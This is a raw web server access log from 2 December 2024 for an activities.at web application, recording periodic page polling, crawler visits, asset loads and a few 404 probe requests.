178.115.42.220 - - [02/Dec/2024:16:04:00 +0100] "GET /entry.php?id=10271&&ser=151779 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151719" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:04:00 +0100] "GET /gui/javascript/form_form.js?1733151840 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151779" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:05:00 +0100] "GET /entry.php?id=10271&&ser=151840 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151779" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:05:00 +0100] "GET /gui/javascript/form_form.js?1733151900 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151840" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:06:00 +0100] "GET /entry.php?id=10271&&ser=151900 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=151840" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:06:00 +0100] "GET /gui/javascript/form_form.js?1733151960 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:07:01 +0100] "GET /entry.php?id=10271&&ser=151960 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=151900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:07:01 +0100] "GET /gui/javascript/form_form.js?1733152021 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=151960" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:08:01 +0100] "GET /entry.php?id=10271&&ser=152021 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=151960" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:08:01 +0100] "GET /gui/javascript/form_form.js?1733152081 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152021" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:09:01 +0100] "GET /entry.php?id=10271&&ser=152081 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152021" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:09:01 +0100] "GET /gui/javascript/form_form.js?1733152141 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152081" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:10:01 +0100] "GET /entry.php?id=10271&&ser=152141 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152081" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:10:02 +0100] "GET /gui/javascript/form_form.js?1733152202 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152141" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:11:02 +0100] "GET /entry.php?id=10271&&ser=152202 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152141" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:11:02 +0100] "GET /gui/javascript/form_form.js?1733152262 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152202" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:12:02 +0100] "GET /entry.php?id=10271&&ser=152262 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152202" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:12:02 +0100] "GET /gui/javascript/form_form.js?1733152322 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152262" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:13:02 +0100] "GET /entry.php?id=10271&&ser=152322 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152262" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:13:03 +0100] "GET /gui/javascript/form_form.js?1733152382 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152322" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.135 - - [02/Dec/2024:16:13:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106231203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:16:14:03 +0100] "GET /entry.php?id=10271&&ser=152382 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152322" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:14:03 +0100] "GET /gui/javascript/form_form.js?1733152443 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152382" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:15:03 +0100] "GET /entry.php?id=10271&&ser=152443 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152382" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:15:03 +0100] "GET /gui/javascript/form_form.js?1733152503 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:16:03 +0100] "GET /entry.php?id=10271&&ser=152503 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:16:03 +0100] "GET /gui/javascript/form_form.js?1733152563 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152503" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
149.56.150.64 - - [02/Dec/2024:16:16:52 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.64 - - [02/Dec/2024:16:16:53 +0100] "GET /robots.txt HTTP/1.1" 404 370 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.64 - - [02/Dec/2024:16:16:54 +0100] "GET /sitemap.xml HTTP/1.1" 404 371 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.64 - - [02/Dec/2024:16:16:54 +0100] "GET /security.txt HTTP/1.1" 404 372 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.64 - - [02/Dec/2024:16:16:54 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 384 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.64 - - [02/Dec/2024:16:16:54 +0100] "GET /ads.txt HTTP/1.1" 404 367 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.64 - - [02/Dec/2024:16:16:54 +0100] "GET /humans.txt HTTP/1.1" 404 370 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.64 - - [02/Dec/2024:16:16:55 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Linux; Android 10; SM-G981B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36"
178.115.42.220 - - [02/Dec/2024:16:17:04 +0100] "GET /entry.php?id=10271&&ser=152563 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152503" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:17:04 +0100] "GET /gui/javascript/form_form.js?1733152624 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152563" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
144.217.135.129 - - [02/Dec/2024:16:17:19 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
144.217.135.129 - - [02/Dec/2024:16:17:19 +0100] "GET /layout.php HTTP/1.1" 200 823 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:19 +0100] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:20 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1901 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:20 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:20 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:20 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://coffeenostra.castlegem.co.uk/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:20 +0100] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:20 +0100] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:20 +0100] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:20 +0100] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:20 +0100] "GET /gui/javascript/form_form.js?1733152640 HTTP/1.1" 200 16206 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:20 +0100] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://coffeenostra.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://coffeenostra.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /gui/images/emptybar.gif HTTP/1.1" 200 89 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 933 "http://coffeenostra.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:21 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2418 "http://coffeenostra.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:22 +0100] "GET /gui/javascript/form_form.js?1733152641 HTTP/1.1" 200 16206 "http://coffeenostra.castlegem.co.uk/entry.php?id=10271&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:22 +0100] "GET /entry.php?id=10270&UIN=22593b02365df6cbaf2171ae2c18cb94 HTTP/1.1" 200 908 "http://coffeenostra.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:22 +0100] "GET /entry.php?id=10273&UIN=22593b02365df6cbaf2171ae2c18cb94 HTTP/1.1" 200 1902 "http://coffeenostra.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
144.217.135.129 - - [02/Dec/2024:16:17:23 +0100] "GET /gui/javascript/form_form.js?1733152642 HTTP/1.1" 200 16206 "http://coffeenostra.castlegem.co.uk/entry.php?id=10270&UIN=22593b02365df6cbaf2171ae2c18cb94" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/102.0.5005.182 Safari/537.36"
156.59.198.136 - - [02/Dec/2024:16:17:31 +0100] "GET /renault.activities.at/htdocs/binaries/10171423_1.pdf HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:16:18:04 +0100] "GET /entry.php?id=10271&&ser=152624 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152563" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:18:04 +0100] "GET /gui/javascript/form_form.js?1733152684 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152624" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:19:04 +0100] "GET /entry.php?id=10271&&ser=152684 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=152624" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:19:04 +0100] "GET /gui/javascript/form_form.js?1733152744 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152684" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:20:04 +0100] "GET /entry.php?id=10271&&ser=152744 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152684" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:20:05 +0100] "GET /gui/javascript/form_form.js?1733152805 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152744" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:21:05 +0100] "GET /entry.php?id=10271&&ser=152805 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152744" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:21:05 +0100] "GET /gui/javascript/form_form.js?1733152865 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152805" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.136 - - [02/Dec/2024:16:21:31 +0100] "GET /ed-test.2web.at/stats/lang/awstats-lt.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:16:22:05 +0100] "GET /entry.php?id=10271&&ser=152865 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152805" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:22:05 +0100] "GET /gui/javascript/form_form.js?1733152925 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152865" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
95.214.55.79 - - [02/Dec/2024:16:22:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.115.42.220 - - [02/Dec/2024:16:23:07 +0100] "GET /entry.php?id=10271&&ser=152925 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152865" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:23:07 +0100] "GET /gui/javascript/form_form.js?1733152987 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152925" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:24:07 +0100] "GET /entry.php?id=10271&&ser=152987 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=152925" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:24:08 +0100] "GET /gui/javascript/form_form.js?1733153048 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=152987" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:25:08 +0100] "GET /entry.php?id=10271&&ser=153048 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=152987" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:25:08 +0100] "GET /gui/javascript/form_form.js?1733153108 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=153048" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:26:08 +0100] "GET /entry.php?id=10271&&ser=153108 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=153048" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:26:08 +0100] "GET /gui/javascript/form_form.js?1733153168 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=153108" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:27:08 +0100] "GET /entry.php?id=10271&&ser=153168 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=153108" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:27:08 +0100] "GET /gui/javascript/form_form.js?1733153228 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=153168" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
154.213.187.20 - - [02/Dec/2024:16:27:30 +0100] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)"
178.115.42.220 - - [02/Dec/2024:16:28:09 +0100] "GET /entry.php?id=10271&&ser=153228 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=153168" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:28:09 +0100] "GET /gui/javascript/form_form.js?1733153289 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=153228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:29:09 +0100] "GET /entry.php?id=10271&&ser=153289 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=153228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:29:09 +0100] "GET /gui/javascript/form_form.js?1733153349 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=153289" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
194.38.20.13 - - [02/Dec/2024:16:30:04 +0100] "GET /assets/plugins/plupload/examples/upload.php HTTP/1.1" 404 395 "-" "ALittle Client"
178.115.42.220 - - [02/Dec/2024:16:30:09 +0100] "GET /entry.php?id=10271&&ser=153349 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=153289" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:30:09 +0100] "GET /gui/javascript/form_form.js?1733153409 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=153349" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
194.38.20.13 - - [02/Dec/2024:16:30:38 +0100] "GET /assets/plugins/plupload/examples/upload.php HTTP/1.1" 404 408 "-" "ALittle Client"
178.115.42.220 - - [02/Dec/2024:16:31:10 +0100] "GET /entry.php?id=10271&&ser=153409 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=153349" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:16:31:10 +0100] "GET /gui/javascript/form_form.js?1733153470 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=153409" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
